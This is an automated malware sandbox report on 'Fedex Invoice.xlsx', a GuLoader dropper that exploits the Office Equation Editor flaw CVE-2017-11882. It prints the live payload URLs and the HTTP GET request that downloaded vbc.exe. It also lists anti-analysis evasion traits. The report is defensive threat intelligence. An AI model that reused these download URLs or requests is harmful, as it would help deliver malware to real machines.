Windows Analysis Report Fedex Invoice.xlsx

Overview

General Information

Sample Name: Fedex Invoice.xlsx
Analysis ID: 483375
MD5: ec7f52b07d135f71c63fd20054a89646
SHA1: c89fa952eaef37a4ad0a120fa2c998cd989bbf62
SHA256: 150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
Tags: FEDEXVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}
Multi AV Scanner detection for submitted file
Source: Fedex Invoice.xlsx Virustotal: Detection: 30% Perma Link
Source: Fedex Invoice.xlsx ReversingLabs: Detection: 27%
Multi AV Scanner detection for domain / URL
Source: http://212.192.246.25/rever/vbc.exe Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 23% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/KELLYREMCOS_UOuJB118.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:51:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 23:18:39 GMTETag: "21000-5cbe8af7096b4"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 5DD04ABC.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B60 6_2_00456B60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B84C 6_2_0045B84C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455467 6_2_00455467
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A062 6_2_0045A062
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456872 6_2_00456872
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A07C 6_2_0045A07C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456C14 6_2_00456C14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453417 6_2_00453417
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454C34 6_2_00454C34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454C3C 6_2_00454C3C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A43B 6_2_0045A43B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A8CD 6_2_0045A8CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_004504E1 6_2_004504E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456CEF 6_2_00456CEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_004558F7 6_2_004558F7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004544FC 6_2_004544FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_004534F9 6_2_004534F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459C85 6_2_00459C85
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045588C 6_2_0045588C
Source: C:\Users\Public\vbc.exe Code function: 6_2_004570AD 6_2_004570AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_004560A9 6_2_004560A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004568A9 6_2_004568A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A4B5 6_2_0045A4B5
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459D57 6_2_00459D57
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457152 6_2_00457152
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045115A 6_2_0045115A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B568 6_2_0045B568
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045517B 6_2_0045517B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455D07 6_2_00455D07
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454D0B 6_2_00454D0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045710A 6_2_0045710A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454515 6_2_00454515
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453D1D 6_2_00453D1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455519 6_2_00455519
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A5C7 6_2_0045A5C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A9C0 6_2_0045A9C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455DCB 6_2_00455DCB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004509E9 6_2_004509E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00452DF5 6_2_00452DF5
Source: C:\Users\Public\vbc.exe Code function: 6_2_004535F1 6_2_004535F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_004545FA 6_2_004545FA
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045618F 6_2_0045618F
Source: C:\Users\Public\vbc.exe Code function: 6_2_004541A1 6_2_004541A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_004551B1 6_2_004551B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B5BB 6_2_0045B5BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B65C 6_2_0045B65C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045265F 6_2_0045265F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457267 6_2_00457267
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459A6C 6_2_00459A6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454A77 6_2_00454A77
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455273 6_2_00455273
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455601 6_2_00455601
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045720D 6_2_0045720D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B60D 6_2_0045B60D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045BA0B 6_2_0045BA0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455A1C 6_2_00455A1C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AE2B 6_2_0045AE2B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454E3D 6_2_00454E3D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453E3F 6_2_00453E3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A63F 6_2_0045A63F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459AC5 6_2_00459AC5
Source: C:\Users\Public\vbc.exe Code function: 6_2_004546CA 6_2_004546CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454EE0 6_2_00454EE0
Source: C:\Users\Public\vbc.exe Code function: 6_2_004532FD 6_2_004532FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451EFA 6_2_00451EFA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455EA6 6_2_00455EA6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004586A3 6_2_004586A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B6AB 6_2_0045B6AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004556B5 6_2_004556B5
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AAB3 6_2_0045AAB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B5E 6_2_00456B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451F6D 6_2_00451F6D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B73 6_2_00456B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045037E 6_2_0045037E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B779 6_2_0045B779
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451B03 6_2_00451B03
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A709 6_2_0045A709
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455B10 6_2_00455B10
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045731C 6_2_0045731C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A320 6_2_0045A320
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AB23 6_2_0045AB23
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045533B 6_2_0045533B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A7DE 6_2_0045A7DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459FE7 6_2_00459FE7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004557EF 6_2_004557EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455BF6 6_2_00455BF6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004503F2 6_2_004503F2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450382 6_2_00450382
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045579F 6_2_0045579F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459B98 6_2_00459B98
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045339B 6_2_0045339B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045ABA0 6_2_0045ABA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455FAB 6_2_00455FAB
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B60 NtAllocateVirtualMemory, 6_2_00456B60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456C14 NtAllocateVirtualMemory, 6_2_00456C14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456CEF NtAllocateVirtualMemory, 6_2_00456CEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B5E NtAllocateVirtualMemory, 6_2_00456B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B73 NtAllocateVirtualMemory, 6_2_00456B73
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Fedex Invoice.xlsx Virustotal: Detection: 30%
Source: Fedex Invoice.xlsx ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Fedex Invoice.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFBCB.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419524 push esi; retn 000Ch 6_2_00419679
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451120 push FFFFFFB9h; retf 6_2_00451125
Source: initial sample Static PE information: section name: .text entropy: 7.10781804596
Source: initial sample Static PE information: section name: .text entropy: 7.10781804596

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
